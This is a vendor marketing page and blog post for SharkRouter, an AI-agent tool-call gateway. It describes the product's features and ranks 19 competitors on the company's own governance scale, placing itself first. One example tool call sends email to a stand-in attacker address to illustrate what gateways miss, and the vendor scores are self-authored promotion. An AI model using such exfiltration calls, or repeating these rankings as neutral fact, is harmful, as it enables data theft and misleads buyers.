SharkRouter is the deterministic data plane for agentic AI. It sits between AI agents and tool execution, providing a 14-step governance pipeline that includes ToolGuard (function-call firewall), Agent Passport (cryptographic identity), Dry-Run Preview (impact preview before execution), Output Assurance (post-execution verification), Kill Switch (immediate halt), and an immutable WORM audit chain.

How is SharkRouter different from prompt filters or monitoring tools?

SharkRouter is not a prompt filter, not an output scanner, and not a monitoring tool. It is a stateful gateway that intercepts every function call an AI agent makes and enforces deterministic business rules before execution. Prompt filters (Pangea, Lakera) only inspect input. Out-of-band monitors (Zenity, Protect AI) observe but cannot enforce. JIT access tools (Oasis Security) manage permissions but do not audit execution. SharkRouter is the only product that intercepts, governs, and audits at the function-call layer with cryptographic proof.

Is SharkRouter OpenAI-compatible?

Yes. SharkRouter is a drop-in replacement for the OpenAI API. Change your base_url to https://api.sharkrouter.ai/v1 and your existing code works unchanged. One line. Full governance. Zero lock-in.

ToolGuard is the function-call firewall at the heart of SharkRouter. It is a deny-by-default policy engine that evaluates every tool call through a 7-guard chain (Regex, Keyword, Schema, Policy, Semantic, LLM, MoralCompass) cost-ordered so the first block wins. Typical added latency is under 150ms. ToolGuard enforces business rules at the execution layer — the only layer where AI agents actually do something.

What is Agent Passport?

Agent Passport assigns cryptographic identity (ECDSA-signed) to every AI agent in your environment. Each passport carries a scoped tool universe, a 9-state lifecycle FSM, and delegation chains with scope narrowing. Trust stages progress STRANGER → KNOWN → TRUSTED → EXTENSION based on observed behavior.

What is Dry-Run Preview?

Dry-Run Preview shows the impact of a destructive tool call before it executes — affected rows, blast radius, estimated cost. Zero of 19 competitors in our State of AI Governance benchmark offer this capability. It is what enables CISOs to approve agentic AI for production systems.

Can SharkRouter be deployed air-gapped?

Yes. SharkRouter offers three deployment tiers: Cloud Gateway (5 minutes), Private VPC (1 day), and Air-Gapped On-Premise (1 week). The air-gapped tier uses offline licensing and runs with zero outbound connectivity — designed for banking, defense, and government environments that cannot use cloud AI services.

What compliance frameworks does SharkRouter support?

SharkRouter is designed compliant by architecture: SOC 2, GDPR, HIPAA, ISO 27001, BOI 364, and EU AI Act Article 14 (human oversight of high-risk AI). The WORM audit chain provides cryptographic chain-of-custody that satisfies banking and regulated-industry audit requirements.

Warden is SharkRouter's open-source governance scanner. Run it against any AI framework or environment and it produces a 17-dimension governance score out of 100. Across 19 AI frameworks and competing gateways, the market average is 28/100. SharkRouter scores 91/100. Warden is free, runs in 60 seconds, and is the first tool a CISO uses in our evaluation funnel.

We published an open methodology to score AI agent governance across 17 dimensions. We scored ourselves and 19 competitors. Highest non-inline vendor: 55. Lowest: 11. Mean: 28. The results expose a 36-point architectural gap the market can't close with features.

We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.

There are over 20 vendors selling AI agent security in 2026. They all promise governance, visibility, and control. They use similar language in their pitch decks. They reference the same OWASP risks. They all claim to protect your AI agents.

We wanted to know which ones actually do.

So we built an open scoring methodology — 17 dimensions, published weights, reproducible evaluation — and scored every vendor we could find, including ourselves. The methodology is available for anyone to audit, challenge, or improve. The registry is version-controlled and refreshed when vendors ship meaningful new capabilities; the numbers in this post are from the 2026-04-10 refresh.

The results are uncomfortable.

The Scoring Framework

The Governance Score evaluates AI agent security across 17 dimensions grouped into three tiers.

Foundational controls cover the minimum viable governance: tool call interception, deny-by-default enforcement, agent identity management, data protection (PII tokenization, encryption), and audit trail integrity. Without these, there is no governance — there is monitoring.

Advanced capabilities include behavioral anomaly detection, post-execution output verification, environmental threat defense (trap detection), multi-agent governance (A2A delegation chains, taint propagation), and compliance framework mapping (EU AI Act, OWASP, MITRE ATLAS).

Operational maturity evaluates deployment flexibility (SaaS, VPC, air-gapped), onboarding friction (how long to full enforcement), adversarial testing tools (chaos engineering, penetration testing), and governance scoring transparency (do they score themselves?).

Each dimension is weighted by security impact. Tool call enforcement carries more weight than dashboard aesthetics. Cryptographic audit trails carry more weight than alerting integrations. The methodology is not designed to make any vendor look good — it is designed to identify where governance actually exists versus where marketing claims it does. We publish our own score under the same methodology and the same weights.

The Numbers (2026-04-10 registry)

Vendor	Category	Score
SharkRouter	Tool-call gateway (inline)	91
Zenity	Out-of-band AI security posture	55
Wiz	Cloud security posture	41
Noma Security	Out-of-band AI security posture	40
Oasis Security	Non-human identity lifecycle	38
HiddenLayer	ML security	34
Portkey	LLM gateway	32
Protect AI (Palo Alto)	ML security	32
Lasso / Intent Security	AI security	30
Kong	API gateway	27
Robust Intelligence / Cisco	AI validation	26
Rubrik	Data recovery	26
Pangea / CrowdStrike	AI guard	23
NeuralTrust	AI security	23
Knostic	AI access control	22
Prompt Security	Prompt security	21
Cloudflare AI Gateway / Envoy	LLM gateway	20
mcp-scan / Snyk	MCP scanner	18
Lakera	Prompt security	13
aiFWall	AI firewall	11

19 competitors. Mean 28. Median 26. Highest 55. Lowest 11. Full registry is in the Warden repo at warden/scanner/competitors.py — you can audit every weight yourself.

The Architectural Bands

The market splits into six architectural categories. Each category has a structural ceiling on what it can achieve.

Prompt-layer vendors — Lakera (13) and Prompt Security (21). They filter text entering and exiting the LLM. They catch jailbreaks, direct prompt injection, and toxic content. Their ceiling is set by position: they cannot see tool call arguments, tool results, or agent-to-agent delegation. Prompt injection defense is necessary. It is not governance.

Out-of-band AI security posture — Zenity (55) and Noma (40). They observe agent behavior from outside the execution path. They detect anomalies, generate alerts, and produce compliance reports. Zenity is the current ceiling of this category and — critically — the highest-scoring non-inline vendor on the board. Their structural ceiling: they can detect but cannot block. By the time an alert fires, the tool call has already executed. Detection without enforcement is monitoring, not governance.

Identity & NHI lifecycle — Oasis Security (38) and Knostic (22). They manage who agents are, what they can access, and who authorized them. They are strong on identity, discovery, and access management. Their ceiling: they know who the agent is and what it's allowed to access, but they don't know what the agent is actually doing with that access. An agent with valid identity and valid permissions can still be manipulated by environmental traps.

LLM gateways & API gateways — Portkey (32), Kong (27), Cloudflare AI Gateway / Envoy (20). They route traffic between agents and LLM providers. They handle cost tracking, caching, rate limiting, and provider failover. They see the traffic but don't understand it semantically. They route send_email(to=attacker@evil.com) the same way they route send_email(to=colleague@company.com) — it's all valid API traffic.

Cloud posture & AI validation — Wiz (41) and Robust Intelligence / Cisco (26). They evaluate infrastructure, scan configurations, and validate model deployments. They answer "is your AI infrastructure configured securely?" They do not answer "is your AI agent doing something it shouldn't be doing right now?"

ML security / model attack surface — HiddenLayer (34) and Protect AI / Palo Alto (32). They defend the model itself — adversarial inputs, model theft, training data poisoning. They're strong on the model attack surface, but they're not positioned to govern what the agent does with the model's output.

The Architectural Gap

The highest-scoring non-inline vendor scored 55. The market average is 28.

This is not because these vendors are poorly built. Many of them are excellent at what they do. The problem is architectural position. Each category occupies a specific position in the stack, and that position determines what they can see and what they can enforce.

No vendor that monitors from outside the execution path can block a tool call before it executes. No vendor that filters only prompts can scan tool results for hidden instructions. No vendor that manages only identity can verify that an agent's output matches its declared intent.

The gap between 55 (Zenity) and 91 (SharkRouter) is 36 points. It is not closable by adding features to existing architectures. It requires a fundamentally different position in the stack — inline, between the agent and everything it touches, with visibility into both requests and responses, tool calls and tool results, agent actions and agent context.

Where We Score Ourselves

We published our own score: 91 out of 100. We also published where we fall short.

Cloud and platform integration: 40%. We support Docker, Kubernetes, and Helm deployment, but we don't have native integrations with every cloud provider's security tooling.

Prompt-layer security: 67%. We have SemanticGuard and LLMGuard for intent analysis, but we are not a dedicated prompt injection vendor. Dedicated prompt-layer tools score higher on pure prompt filtering — although they score lower everywhere else, which is why their total lands at 13–21.

Data recovery: 50%. WORM audit provides immutable records and cryptographic shredding handles GDPR deletion, but we don't offer full disaster recovery orchestration.

Publishing where you score low is as important as publishing where you score high. A vendor that claims 100% coverage across all dimensions is either lying or hasn't been evaluated rigorously. We explicitly don't claim 100%.

How to Use the Score

The Governance Score is not a purchasing decision. It is a diagnostic tool.

Run Warden — our open-source governance scanner — against your own environment. It evaluates your codebase, MCP configurations, agent architecture, and infrastructure against the same 17 dimensions. The output tells you where your governance gaps are, not which vendor to buy.

If your score is below 30 (most organizations we scan), the first question is not "which vendor should we deploy?" The first question is "do we know how many AI agents are running in our environment right now?" Most enterprises cannot answer this question.

If your score is between 30 and 50, you likely have identity and access controls but lack enforcement. You know who your agents are. You don't know what they're doing in real time. You cannot block a tool call before it executes.

If your score is above 50, you have some inline enforcement capability. The question becomes: are you scanning tool results? Are you verifying output? Are you detecting environmental traps? Are you testing adversarially?

The Methodology Is Open

We publish the scoring methodology in full. Any vendor, researcher, or security team can evaluate themselves or evaluate us using the same framework. We welcome challenges to the weights, dimensions, or evaluation criteria — the registry is a source file in a public repository, and every score change is a commit with a rationale in the message.

The reason is simple: if the methodology is secret, it's marketing. If the methodology is open, it's a standard. The AI agent governance market needs standards, not more marketing.

Run Warden free against your own project — same 17 dimensions, same weights, same report format we use to score ourselves and every vendor in the registry:

pip install warden-ai
warden scan ./your-project --format html

Full registry, every vendor score, every weight, every rationale — all at github.com/SharkRouter/warden.

We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.

We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.

The Scoring Framework

The Numbers (2026-04-10 registry)

The Architectural Bands

The Architectural Gap

Where We Score Ourselves

How to Use the Score

The Methodology Is Open

Gilad Gabay